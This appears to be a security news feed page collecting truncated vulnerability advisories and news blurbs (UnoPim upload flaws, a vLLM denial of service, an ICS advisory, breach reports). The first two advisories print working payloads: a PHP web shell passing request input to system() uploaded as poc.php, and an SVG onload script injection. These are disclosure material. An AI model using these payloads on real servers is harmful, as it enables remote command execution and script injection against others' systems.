Latest News

### Summary: Affected Functionality: **Image upload at User creation** Endpoint: `/admin/settings/users/create` ### Details The image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file. Modified part of the multipart request body: ``` Content-Disposition: form-data; name="image[]"; filename="poc.php" Content-Type: application/x-php <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?> ``` ### PoC 1. Upload an image file as profile picture during user creation , now capture the request and modify. File content: ```<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>``` File name: poc.php Content-Type can be any, doesn't matter. 2. Access the up...

### Summary Affected Functionality: User creation Endpoint: `/admin/settings/users/create` ### Details https://github.com/unopim/unopim/blob/a0dc81947a59ada69e19e1e4313dd591d4e277b4/packages/Webkul/Core/src/Traits/Sanitizer.php#L9-L19 See the mimetype is checked for validation. Mime-type is usually identified by analysing the first few bytes of the file content, which contains the File signature or Magic bytes for e.g. GIF file starts with GIF87a or GIF89a. We can mislead the sanitizer to think the uploaded file is gif ( based on magic byte provided ) while actually it is a .svg file. File containing <svg> is considered as svg and is sanitized:  ``` Content-Disposition: form-data; name="image[]"; filename="poc.html" Content-Type: image/svg+xml <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 200 200" onload="alert(5)"> <rect ...

### Summary A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user. ### Details The vulnerability leverages the abuse of HTTP headers. By setting a header such as `X-Forwarded-For` to a very large value like `("A" * 5_800_000_000)`, the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system resources. ### Impact _What kind of vulnerability is it? Who is impacted?_ Type of vulnerability: Denial of Service (DoS) ### Resolution Upgrade to a version of vLLM that includes appropriate HTTP limits by deafult, or use a proxy in front of vLLM which provides protection against this issue.

Attackers will continue to evolve, and the help desk will always be a target. But with the right mix of training, support, and trust, frontline agents can become your biggest security assets.

Logging netflows provided valuable insight about attacker tactics during a breach by state-sponsored hackers targeting Columbia's research labs.

DARPA's Kathleen Fisher discusses the AI Cyber Challenge at DEF CON 33, and the results that proved how automation can help patch vulnerabilities at scale.

Apple has released security updates to patch a zero-day vulnerability tracked as CVE-2025-43300 for all platforms

View CSAF 1. EXECUTIVE SUMMARY CVSS v3 5.3 ATTENTION: Exploitable remotely/Low attack complexity Vendor: Mitsubishi Electric Corporation Equipment: MELSEC iQ-F Series CPU module Vulnerability: Improper Handling of Length Parameter Inconsistency 2. RISK EVALUATION Successful exploitation of this vulnerability could result in a remote attacker being able to delay the processing of the Web server function and prevent legitimate users from utilizing the Web server function by sending a specially crafted HTTP request. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of MELSEC iQ-F Series CPU module are affected: MELSEC iQ-F Series CPU module FX5U-32MT/ES: Versions 1.060 and later MELSEC iQ-F Series CPU module FX5U-32MT/DS: Versions 1.060 and later MELSEC iQ-F Series CPU module FX5U-32MT/ESS: Versions 1.060 and later MELSEC iQ-F Series CPU module FX5U-32MT/DSS: Versions 1.060 and later MELSEC iQ-F Series CPU module FX5U-32MR/ES: Versions 1.060 and later MELSEC iQ-F Series CP...

Google has settled a lawsuit against YouTube for $30 million but did not admit collecting the data of minors for targeted advertising.

Ohio Medical Alliance exposed a medical marijuana patient database containing 957,000 records, including SSNs, IDs, health files, and…